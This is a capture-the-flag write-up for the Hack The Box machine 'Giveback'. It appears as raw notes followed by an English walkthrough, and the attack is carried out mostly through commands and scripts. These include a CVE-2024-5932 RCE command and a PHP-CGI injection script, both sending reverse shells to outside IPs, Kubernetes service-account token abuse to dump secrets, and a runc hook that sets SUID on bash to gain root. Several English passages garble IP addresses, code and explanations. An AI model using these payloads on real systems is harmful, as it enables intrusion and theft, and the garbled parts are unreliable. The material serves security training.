# Nmap 7.95 scan initiated Wed Dec 24 15:34:22 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.94
Nmap scan report for giveback.htb (10.10.11.94)
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_  256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp open  http    nginx 1.28.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: nginx/1.28.0
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI
|_http-generator: WordPress 6.8.1
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime guess: 37.282 days (since Mon Nov 17 08:48:12 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 24 15:34:50 2025 -- 1 IP address (1 host up) scanned in 28.69 seconds

➜  Giveback wpscan --url http://giveback.htb/ -e p
[+] give
 | Location: http://giveback.htb/wp-content/plugins/give/
 | Last Updated: 2025-12-08T20:09:00.000Z
 | [!] The version is out of date, the latest version is 4.13.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By:
 |  Urls In 404 Page (Passive Detection)
 |  Meta Tag (Passive Detection)
 |  Javascript Var (Passive Detection)
 |
 | Version: 3.14.0 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://giveback.htb/wp-content/plugins/give/assets/dist/css/give.css?ver=3.14.0
 | Confirmed By:
 |  Meta Tag (Passive Detection)
 |   - http://giveback.htb/, Match: 'Give v3.14.0'
 |  Javascript Var (Passive Detection)
 |   - http://giveback.htb/, Match: '"1","give_version":"3.14.0","magnific_options"'

python CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need/ -c "bash -c 'bash -i >& /dev/tcp/10.10.16.81/4444 0>&1'"

LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
LEGACY_INTRANET_SERVICE_SERVICE_PORT=5000
LEGACY_INTRANET_SERVICE_SERVICE_PORT_HTTP=5000

"Windows-style CGI handling was retained" (保留了 Windows 风格的 CGI 处理)
<a href="/cgi-bin/php-cgi">/cgi-bin/php-cgi</a> # 暴露cgi二进制文件
"Cluster misconfiguration" (集群配置错误)

cat > 1.php << 'EOF'
<?php
// 目标 URL (Target URL)
$url = 'http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input';

// 准备 POST 数据
// Payload 必须是合法的 PHP 代码
$data = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.125 4444 >/tmp/f';

// 创建流上下文选项 (Stream Context Options)
$opts = array(
    'http' => array(
        'method'  => 'POST',
        'header'  => 'Content-type: application/x-www-form-urlencoded',
        'content' => $data
    )
);

// stream_context_create: 创建资源流上下文
$context  = stream_context_create($opts);

// 发送请求并获取结果
$result = file_get_contents($url, false, $context);

if ($result === FALSE) {
    echo "请求失败\n";
} else {
    echo $result;
}
?>
EOF

$ env
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.43.0.1:443
HOSTNAME=legacy-intranet-cms-6f7bf5db84-zcx88

# List secrets in all namespaces
kubectl get secrets --all-namespaces

# Get secret details
kubectl describe secret secret-name -n namespace

# Using API
curl https://target.com:6443/api/v1/namespaces/default/secrets \
  -H "Authorization: Bearer TOKEN" --insecure

TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
curl -sSk -H "Authorization: Bearer $TOKEN" https://10.43.0.1/api/v1/namespaces/default/secrets | jq -r '.items[].metadata.name'
# 得到user-secret-babywyrm

$ echo 'TUV0a2xHcDhTNTduZ3VFbk9pa053RklXZk91aEQ0Mw==' | base64 -d
MEtklGp8S57nguEnOikNwFIWfOuhD43

curl -sSk -H "Authorization: Bearer $TOKEN" https://10.43.0.1/api/v1/namespaces/default/secrets/beta-vino-wp-mariadb
curl -sSk -H "Authorization: Bearer $TOKEN" https://10.43.0.1/api/v1/namespaces/default/secrets/beta-vino-wp-wordpress

babywyrm@giveback:~$ sudo -l
Matching Defaults entries for babywyrm on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0, timestamp_timeout=20

User babywyrm may run the following commands on localhost:
    (ALL) NOPASSWD: !ALL
    (ALL) /opt/debug
babywyrm@giveback:~$ sudo debug
sudo: debug: command not found
babywyrm@giveback:~$ sudo /opt/debug
[sudo] password for babywyrm:
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:
# 输入密码sW5sp4spa3u7RLyetrekE4oS
Error: No command specified. Use '/opt/debug --help' for usage information.

babywyrm@giveback:~$ sudo /opt/debug --help
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:

[*] Administrative password verified
[*] Processing command: --help
Restricted runc Debug Wrapper

Usage:
  /opt/debug [flags] spec
  /opt/debug [flags] run <id>
  /opt/debug version | --version | -v

Flags:
  --log <file>
  --root <path>
  --debug

babywyrm@giveback:/tmp/rootfs$ sudo /opt/debug spec
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:

[*] Administrative password verified
[*] Processing command: spec
babywyrm@giveback:/tmp/rootfs$ ls -la
total 12
drwxrwxr-x  2 babywyrm babywyrm 4096 Dec 24 14:39 .
drwxrwxrwt 13 root     root     4096 Dec 24 14:39 ..
-rw-r--r--  1 root     root     3025 Dec 24 14:39 config.json

import json
import os

# 读取
with open("config.json", "r") as f:
    data = json.load(f)
# 添加
data["hooks"] = {
    "prestart": [
        {
            "path": "/bin/sh",
            "args": ["sh", "-c", "chmod +s /bin/bash"],
            "env": []
        }
    ]
}
# 移除
os.remove("config.json")
# 
with open("config.json", "w") as f:
    json.dump(data, f)

$ babywyrm@giveback:/tmp/rootfs$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1396520 Mar 14  2024 /bin/bash
$ babywyrm@giveback:/tmp/rootfs$ mkdir rootfs
$ babywyrm@giveback:/tmp/rootfs$ ls
change.py  config.json  rootfs
$ babywyrm@giveback:/tmp/rootfs$ sudo /opt/debug run pwn
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:

[*] Administrative password verified
[*] Processing command: run
[*] Starting container: pwn
ERRO[0000] runc run failed: unable to start container process: exec: "/bin/sh": stat /bin/sh: no such file or directory
$ babywyrm@giveback:/tmp/rootfs$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14  2024 /bin/bash
$ babywyrm@giveback:/tmp/rootfs$ /bin/bash -p
bash-5.1# id
uid=1000(babywyrm) gid=1000(babywyrm) euid=0(root) egid=0(root) groups=0(root),1000(babywyrm)

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'bitnami_wordpress' );

/** Database username */
define( 'DB_USER', 'bn_wordpress' );

/** Database password */
define( 'DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS' );

/** Database hostname */
define( 'DB_HOST', 'beta-vino-wp-mariadb:3306' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

O8F7KR5zGiI have no name!@beta-vino-wp-wordpress-7b9d98d8d6-4jqln:/secrets$ ls
mariadb-password  mariadb-root-password  wordpress-password

htb Giveback

Information Gathering (Nmap Results)

# Nmap 7.95 scan initiated on Wednesday, December 24, 2025, at 15:34:22, as follows:
# /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.94
Nmap scan report for giveback.htb (10.10.11.94):
Host is up (latency: 0.26 seconds).
998 closed TCP ports were not displayed (they were reset).

PORT     STATE      SERVICE      VERSION
22/tcp    open       ssh         OpenSSH 8.9p1    Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
|     ssh-hostkey:
|       256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|       256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp    open       http         nginx 1.28.0
|      http-robots.txt: 1 disallowed entry
|      /wp-admin/
|      http-server-header: nginx/1.28.0
|      HTTP methods:
|        Supported methods: GET, HEAD, POST
|      HTTP title: “GIVING BACK IS WHAT MATTERS MOST” (obvious)
|      HTTP generator: WordPress 6.8.1
Device type: General purpose / router
Operating system: Linux 4.X/5.X, MikroTik RouterOS 7.X
OS details: Linux 4.15–5.19, MikroTik RouterOS 7.2–7.5 (latest version: 7.5)
Uptime estimate: 37.282 days (since Monday, November 17, 2025, 08:48:12)
Network distance: 2 hops
TCP sequence prediction difficulty: 257 (Difficult to predict sequences!)
IP ID sequence generation: All zeros
Service information: Operating system: Linux; CPE: cpe:/o:linux:linux_kernel

Data files were read from: /usr/share/nmap
Any incorrect results should be reported at: https://nmap.org/submit/
# Nmap completed on Wednesday, December 24, 2025, at 15:34:50. 1 IP address (1 host up) was scanned in 28.69 seconds.

Vulnerability Analysis

Since it’s a WordPress site, we can use wpscan to perform the vulnerability scan.

➜ Giveback wpscan --url http://giveback.htb/ -e p
[+] give
 | Location: http://giveback.htb/wp-content/plugins/give/
 | Last Updated: 2025-12-08T20:09:00.000Z
 | [!] The version is out of date; the latest version is 4.13.2.
 |
 | Found By: URLs on the homepage (passive detection)
 | Confirmed By:
 | 404 error pages (passive detection)
 | Meta tags (passive detection)
 | JavaScript variables (passive detection)
 |
 | Version: 3.14.0 (100% confidence)
 | Found By: Query parameters (passive detection)
 |  - http://giveback.htb/wp-content/plugins/give/assets/dist/css/give.css?ver=3.14.0
 | Confirmed By:
 |  Meta tags (passive detection)
 |   - http://giveback.htb/ (match: ‘Give v3.14.0’)
 |  JavaScript variables (passive detection)
 |   - http://giveback.htb/ (match: “1”, “give_version”: “3.14.0”, “magnific_options”)
 |

Exploitation (User Flag)

The target version (v3.14.0) has the vulnerability CVE-2024-5932 as identified by our research.

We can exploit this vulnerability using the following command:

python CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need/ -c "bash -c 'bash -i >& /dev/tcp/10.10.16.81/4444 0>&1'"

This command sends a remote code execution (RCE) request to the target system.

Upon execution, we discover that we are inside a container.

Next, we run the linpeas.sh script to gather additional information about the target environment:

LEGACYINTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
LEGACYINTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
LEGACYINTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
LEGACYINTRANET_SERVICE_PORT_5000_TCP_PORT=5000
LEGACYINTRANET_SERVICE_PORT_5000_TCPPROTO=tcp
LEGACYINTRANET_SERVICE_SERVICE_HOST=10.43.2.241
LEGACYINTRANET_SERVICE_PORT=5000
LEGACYINTRANET_SERVICE_PORT_HTTP=5000

This reveals the existence of an internal service running on port 5000 at the IP address 10.43.241.

We attempt to access the service using curl, but it does not work. However, we notice that PHP is available on the target system:

php -r "echo file_get_contents('[http://10.43.2.241:5000/](http://10.43.241:5000/)');"

This command shows that the target system uses a Windows-style CGI handling mechanism, and the CGI binary file (cgi-bin/php-cgi) is exposed.

Further analysis reveals a configuration issue with the PHP cluster:

php -r "echo file_get_contents('[http://10.43.24.241:5000/cgi-bin/php-cgi?'](http://10.43.241:5000/cgi-bin/php-cgi?%27));"

This command returns “OK”, indicating that the vulnerability can be exploited.

We search for related PHP vulnerabilities and find CVE-2012-1823 and CVE-2024-4577. We can refer to this blog post for more details.

The payload for exploiting this vulnerability is:

http://10.43.241:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input

For Linux systems, we can simply create a PHP script to exploit this vulnerability:

cat > 1.php << 'EOF'
<?php
// Target URL
$url = 'http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input';

// Prepare the POST data (the payload must be valid PHP code)
$data = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.125 4444 >/tmp/f';

This script will remove a temporary file, create a new one, and use it to execute a command that sends a malicious request to the target system (nc 10.10.14.125 4444).

// Create stream context options $opts = array( 'http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' =>$data ) );

// Create a resource stream context $context = stream_context_create($opts);

// Send the request and retrieve the result $result = file_get_contents($url, false, $context);

if (result === FALSE) { echo "Request failed\n"; } else { echo result; } ?> EOF

Vulnerability Summary

This script exploits a command-line parameter injection vulnerability in PHP-CGI:

1. In CGI mode, URL query parameters are mistakenly interpreted as command-line arguments and passed to php-cgi.
2. The attacker modifies the PHP configuration using the -define directive.
3. By setting auto_prepend_file=php://input, PHP executes the code contained within the POST request body.
4. As a result, the attacker gains access to a reverse shell on the target server.

Once the shell is obtained, it seems to be within a container, but this time, the attacker can execute various commands:

$ env
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.43.0.1:443
HOSTNAME=legacy-intranet-cms-6f7bf5db84-zcx88

For more information on Kubernetes, you can refer to the following blogs:

• Kubernetes for Pentesters: Part 1
• Kubernetes API

List all secrets across all namespaces

kubectl get secrets —all-namespaces

View details of a specific secret

kubectl describe secret secret-name -n namespace

Using the API

curl https://target.com:6443/api/v1/namespaces/default/secrets
-H “Authorization: Bearer TOKEN” —insecure

You can use the following script to retrieve the secret value:

TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
curl -sSk -H "Authorization: Bearer $TOKEN" https://10.43.0.1/api/v1/namespaces/default/secrets | jq -r '.items[].metadata.name'
# This will output "user-secret-babywyrm"

To view the user information associated with the secret, use:

curl -H "Authorization: Bearer $TOKEN" https://10.43.0.1/api/v1/namespaces/default/secrets/user-secret-babywyrm -k

To obtain the password, decode the corresponding JSON output using base64 -d:

$ echo 'TUV0a2xHcDhTNTduZ3VFbk9pa053RklXZk91aEQ0Mw==' | base64 -d
MEtklGp8S57nguEnOikNwFIWfOuhD43

With the password, you can log in to the shell using:

curl -sSk -H "Authorization: Bearer $TOKEN" https://10.43.0.1/api/v1/namespaces/default/secrets/beta-vino-wp-mariadb
curl -sSk -H "Authorization: Bearer $TOKEN" https://10.43.0.1/api/v1/namespaces/default/secrets/beta-vino-wp-wordpress

You will then receive another password in JSON format, which you can decode in the same way to gain access to the corresponding secrets.

Privilege Escalation (Root Flag)

babywyrm@giveback:~$ sudo -l
The following settings are applied by default for the user babywyrm on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0, timestamp_timeout=20

User babywyrm has the following permissions on localhost:
    (ALL) NOPASSWD: !ALL
    (ALL) /opt/debug

Try running the `debug` command with `sudo`:
```bash
babywyrm@giveback:~$ sudo debug
sudo: command not found
babywyrm@giveback:~$ sudo /opt/debug
[sudo] password for babywyrm:
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:

Enter the administrative password to proceed with privilege escalation.

Enter the password: sW5sp4spa3u7RLyetrekE4oS

Error: No command specified. Use /opt/debug --help for usage information.

babywyrm@giveback:~$ sudo /opt/debug —help [] Validating sudo privileges… [] Sudo validation successful Please enter the administrative password:

[] Administrative password verified [] Processing command: —help Restricted runc Debug Wrapper

Usage: /opt/debug [flags] spec /opt/debug [flags] run /opt/debug version | —version | -v

Flags: —log —root —debug

babywyrm@giveback:/tmp/rootfs$ sudo /opt/debug spec [] Validating sudo privileges… [] Sudo validation successful Please enter the administrative password:

[] Administrative password verified [] Processing command: spec babywyrm@giveback:/tmp/rootfs$ ls -la total 12 drwxrwxr-x 2 babywyrm babywyrm 4096 Dec 24 14:39 . drwxrwxrwt 13 root root 4096 Dec 24 14:39 .. -rw-r—r— 1 root root 3025 Dec 24 14:39 config.json

This file is located in our folder. The tool is essentially encapsulating the functionality of runc. Our approach is as follows:

1. Read the config.json file.
2. Delete the config.json file.
3. Add a malicious hook to the configuration.
4. Generate a new config.json file.
5. Run the application.

import json
import os

# Read the config.json file
with open("config.json", "r") as f:
    data = json.load(f)

# Add the malicious hook
data["hooks"] = {
    "prestart": [
        {
            "path": "/bin/sh",
            "args": ["sh", "-c", "chmod +s /bin/bash"],
            "env": []
        }
    ]
}

# Delete the original config.json file
os.remove("config.json")

$ babywyrm@giveback:/tmp/rootfs$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1396520 Mar 14  2024 /bin/bash
$ babywyrm@giveback:/tmp/rootfs$ mkdir rootfs
$ babywyrm@giveback:/tmp/rootfs$ ls
change.py  config.json  rootfs
$ babywyrm@giveback:/tmp/rootfs$ sudo /opt/debug run pwn
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:

[*] Administrative password verified
[*] Processing command: run
[*] Starting container: pwn
ERRO[0000] runc run failed: unable to start container process: exec: "/bin/sh": stat /bin/sh: no such file or directory
$ babywyrm@giveback:/tmp/rootfs$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14  2024 /bin/bash
$ babywyrm@giveback:/tmp/rootfs$ /bin/bash -p
bash-5.1# id
uid=1000(babywyrm) gid=1000(babywyrm) euid=0(root) egid=0(root) groups=0(root),1000(babywyrm)

Lessons Learned

After entering the first shell, it was discovered that the file /opt/bitnami/wordpress/wp-config.php contains the database credentials.

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'bitnami_wordpress' );

/** Database username */
define( 'DB_USER', 'bn_wordpress' );

/** Database password */
define( 'DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS' );

/** Database hostname */
define( 'DB_HOST', 'beta-vino-wp-mariadb:3306' );

/** Database charset to use in creating database tables. */
define( 'DBCharset', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB COLLATE', '' );

The command to connect to the database is:

mysql -h beta-vino-wp-mariadb -P 3306 -u bn_wordpress -p bitnami_wordpress

• -p is used to specify the password.
• bitnami_wordpress is the username for connecting to the database.

The credentials were extracted as user:$P$Bm1D6gJHKylnyyTeT0oYNGKpib//vP.

However, it was not possible to crack this password.

O8F7KR5zGiI have no name!@beta-vino-wp-wordpress-7b9d98d8d6-4jqln:/secrets$ ls
mariadb-password  mariadb-root-password  wordpress-password

These three files also did not contain any useful information.